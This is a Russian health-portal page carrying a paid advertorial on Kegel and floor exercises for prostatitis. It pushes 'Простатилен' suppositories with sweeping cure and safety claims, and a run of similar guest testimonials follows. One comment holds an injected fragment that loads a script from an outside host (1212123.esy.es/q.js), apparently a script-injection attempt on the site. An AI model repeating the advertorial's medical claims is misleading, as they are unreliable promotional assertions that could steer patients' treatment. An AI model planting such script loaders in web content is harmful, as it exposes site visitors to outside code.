Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гимнастика Кегеля при леч...  >>  Гимнастика Кегеля при лечении простатита
 
Обратная связь
 

Гимнастика Кегеля при лечении простатита

Размер шрифта
29 января 2015 00:00
  • google_analytics: false
  • Нравится

Для лечения и профилактики простатита врачи рекомендуют вести активный образ жизни, заниматься спортом, а также обратиться к лечебной гимнастике Кегеля, которая известна своей эффективностью.

Гимнастика Кегеля при лечении простатита

Разработана она была врачом Арнольдом Кегелем еще 1920-х годах и до сих пользуется огромной популярностью во всем мире среди мужчин и женщин. Связано это с тем, что упражнения довольно быстро укрепляют мышцы тазового дна и для их выполнения не нужно обладать специальной подготовкой или ходить в тренажерный зал. К тому же, некотоые из них можно выполнять прямо за компьютером или по пути на работу.

Упражнения по Кегелю:

  • Для начала необходимо попеременно расслаблять и напрягать ягодицы и втягивать мышечное кольцо ануса. Начните с 10 повторений, постепенно увеличивая их число до 50 по 3-4 раза за сутки.
  • Сократите мышцы тазового дна на 5-7 секунд, а потом расслабьте их. Повторять нужно не меньше десяти раз в день, еженедельно увеличивая время одного сокращения.
  • Во время процесса мочеиспускания прервите 4-5 раз струю мочи, а потом расслабьтесь и возобновите мочеиспускание. Стоит отметить, что первоначально многие пациенты испытывают слабые боли внизу живота и резь в мочеточнике, но уже через пару дней постоянных тренировок эти ощущения пропадают. 

Гимнастика Кегеля при лечении простатита

Но не стоит ограничиваться только этими упражнениями. Есть и другая гимнастика, которую также можно выполнять дома, но при этом она обладает не меньшей эффективностью.

  • Лежа на спине 5-8 раз поднимите таз и одновременно разведите колени. Необходимо ежедневно проводить по три подхода.
  • Оставайтесь в том же положении, но при этом поднимите ноги на 2-3 сантиметра от пола, а туловище приподнимите на локтях. После этого нужно попеременно разводить и сводить ноги 8-10 раз по два подхода.
  • Эффективным упражнением является и всем привычная еще со школьной скамьи «березка». Нужно поднять таз и нижние конечности вертикально вверх, руками поддерживая тело в области поясницы. Упражнение нужно выполнить минимум пять раз в два подхода.
  • Лягте на бок и поднимите прямую ногу на несколько сантиметров от пола и сделайте круговые движения сначала по часовой стрелке, а потом в обратном направлении. После чего поменяйте ногу. Упражнение нужно делать по 10-12 повторов в два подхода.
  • Лягте на живот и поочередно поднимайте выпрямленные ноги на несколько сантиметров от пола. Необходимо сделать минимум по 10 повторений в два подхода.
  • Оставаясь на животе, поднимите ноги от поверхности пола и зафиксируйтесь так на несколько секунд, после чего их можно отпустить. Выполняйте это упражнение по 5 повторений в три подхода.

Несомненно, что эффективность лечебной гимнастики велика, но она направлена лишь на укрепление мышц, а не на избавление от простатита, поэтому не стоит забывать о медикаментозном лечении. Чаще всего российские врачи прописывают своим пациентам проверенное и недорогое лекарство отечественного производства – «Простатилен».

Гимнастика Кегеля при лечении простатита

Пептидные ректальные суппозитории «Простатилен» давно доказали свою эффективность, которая связана не только с действенным составом препарата, но и его лекарственной формой. «Простатилен» намного быстрее снимает симптомы, нежели таблетки и уколы благодаря тому, что попадает к простате в более концентрированной форме. Кроме того, он абсолютно не нагружает печень.

Лечебная гимнастика в комплексе с «Простатиленом» способны в кратчайшие сроки избавить пациента от простатита, а так же нормализовать его эрекцию и репродуктивную функцию.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

02 февраля 2015 в 19:50

Цитировать   |   Пожаловаться

Мой муж давно страдает простатитом. Заболевание очень неприятное и деликатное. У нас город небольшой и муж, как многие мужчины, стесняется обращаться к врачу. Коллега по секрету посоветовала попробовать это лекарство, которое описывается в статье. Купила, будем пробовать.

2 - Гость

02 февраля 2015 в 20:19

Цитировать   |   Пожаловаться

Ужасная болезнь. Сначала заказал в интернете массажер простаты, такая ерунда, один вред от нее и неудобства. Взял себя в руки, пошел к врачу. Назначил массаж и свечи простатилен, стало легче. Попробую еще и эти упражнения поделать.

3 - Гость

02 февраля 2015 в 20:15

Цитировать   |   Пожаловаться

Мне кажется, что в настоящее время эта болезнь поражает процентов 90 мужчин. Это уже болезнь века, а они все стесняются пойти с жалобами к врачу... Мой уже и столько трав перепробовал, и к бабке ездил, и дорогие импортные лекарства пил. Толку практически не было( Вот теперь начали практиковать данный комплекс упражнений и лекарства. Пока результат позитивный. Надеюсь, дальше прогресс будет еще ощутимее.

4 - Гость

02 февраля 2015 в 20:29

Цитировать   |   Пожаловаться

Болею простатитом уже несколько лет. Когда пройду курс лечения, отпускает, но через месяц , полтора, симптомы возвращаются. На работе целый день сижу за компьютером, врач посоветовал сменить образ жизни. О гимнастике Кегеля рассказал друг. Решил попробовать. Уже 3 месяца чувствую себя хорошо.

5 - Гость

03 февраля 2015 в 00:49

Цитировать   |   Пожаловаться

Мой папа уже несколько лет страдает простатитом. Как же он измучился каждую ночь, по несколько раз, вставать в туалет. Какие только лекарства он не принимал. Сотрудник на работе посоветовал ему попробовать Простатилен, а тут еще прочитали про упражнения Кегеля. Будет пробовать все в комплексе.

6 - Гость

03 февраля 2015 в 09:59

Цитировать   |   Пожаловаться

Болезнь неприятная, назойливая и мучительная. Не мог нормально с женой сблизиться, получалось только всю ночь в туалете проводить. Попробовал Простатилен, резь и неудобства прошли, аппарат действует.

7 - Гость

03 февраля 2015 в 11:22

Цитировать   |   Пожаловаться

Простатитом в настоящее время болеют даже молодые. Моему мужу Простатилен помог, но чтобы получить более быстрый эффект надо к проблеме подходить комплексно. Упражнения, здоровый образ жизни и все будет супер. Только вот мужчинам это порой не по силам.

8 - Гость

05 февраля 2015 в 11:18

Цитировать   |   Пожаловаться

Эти чудесные упражнения вообще, если я не ошибаюсь использую в гинекологии почти от всего. Главное можно этим в метро заниматься! Никто не узнает)

9 - Гость

05 февраля 2015 в 11:25

Цитировать   |   Пожаловаться

Об этих упражнениях узнал от знакомого. Сначала посмеялся, а потом, когда совсем приперло, решил попробовать. Знаете, действительно стало легче, особенно в купе с Простатиленом.

10 - zzzzzz

30 июня 2015 в 18:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

1 | 2 Следующая

Статьи

       
За мужским здоровьем – в Турцию   Болевой синдром при простатите   Толстые мужчины умрут от рака простаты   10 мифов о мужском здоровье  
02 ноября 2012Толстые мужчины умрут от рака простаты 16 апреля 2013Можно ли заразиться вирусом и вылечить рак? Оказывается, да!
 
29 января 2013Зеленый чай замедляет прогрессирование рака простаты 18 сентября 2012Нет презерватива? Будет рак простаты!
 

Слайдшоу

1
Как не потерять мужа?
Ваш мочевой пузырь такой загадочный!
Чем полезен секс?

Тесты

1
Яички – удивительный орган
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.